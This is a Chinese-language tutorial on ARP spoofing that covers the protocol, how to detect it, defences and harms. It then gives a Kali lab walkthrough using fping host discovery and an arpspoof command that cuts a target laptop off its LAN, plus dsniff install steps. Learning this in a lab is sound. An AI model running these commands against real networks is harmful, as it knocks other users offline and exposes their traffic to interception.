ARP地址欺騙


ARP地址欺騙

Arp欺騙攻擊

利用ARP協議的缺陷進行的一種非法攻擊

ARP協議

地址解析協議,將IP地址轉換為對應的mac地址,屬鏈路層協議
數據包分為:

請求包(廣播):本機IP地址、mac地址+目標主機IP地址

應答包(單播):本機IP地址、mac地址+來源主機IP地址、mac地址

通信方式:

主機A和主機B通信過程:

ARP欺騙攻擊的檢測與防御

檢測:

1、網絡頻繁掉線

2、網速突然變慢

3、使用arp -a命令查看的網關mac地址與真實的網關mac地址不同

4、使用嗅探軟件發現局域網內存在大量arp應答包

防御:

1、綁定mac地址

2、使用靜態arp緩存表

3、使用arp服務器,通過服務器來查找arp轉換表來響應其他機器的廣播

4、使用arp欺騙防護軟件

ARP欺騙的危害

1、使同一網段內其他用戶無法上網

2、可以嗅探到交換式局域網中的所有數據包

3、對信息進行篡改

4、可以控制局域網內任何主機

ARP地址欺騙攻擊過程

首先准備兩台設備,一台:kail,作為攻擊機。一台:靶機(筆記本電腦)

場景:兩台設備需要在同一個局域網下,網關相同;

第一步:

查看靶機和攻擊機的IP地址:

靶機:ipconfig

攻擊機:ifconfig

 第二步:查看相同網段下存活的主機

(如果不知道對方主機IP地址,可以觀察存活主機來判斷對方主機的ip地址)

fping -g 192.168.199.0/24

第三步:發起攻擊

首先在靶機查看是否聯網

ping www.baidu.com

 然后在攻擊機上發起攻擊

arpspoof -i eth0 -t  192.168.199.61 192.168.199.1

看到靶機無法上網

然后再到攻擊機上停止攻擊

(Ctrl + Z)

發現靶機恢復正常

找不到命令解決

第一步換源

進入 cd /etc/apt
更換兩個源地址

deb http://archive.ubuntu.com/ubuntu/ trusty main universe restricted multiverse
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

第二步安裝

輸入arpspoof發現沒有安裝,現在開始安裝

apt-get install dsniff

這時候報錯提示E:有為滿足的依賴關系,請嘗試不指明軟件包的名字.......等等

未安裝成功得原因是有相應的依賴包,這時候可根據提示輸入

apt --fix-broken install

等待安裝跑完輸入

apt-get install dsniff ssldump

第三步檢測

這時輸入arpspoof發現可以出現安裝版本,證明已經安裝成功

輸入apt-get install dsniff,安裝完成后就可用進行arp欺騙,使局域網用戶斷網


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM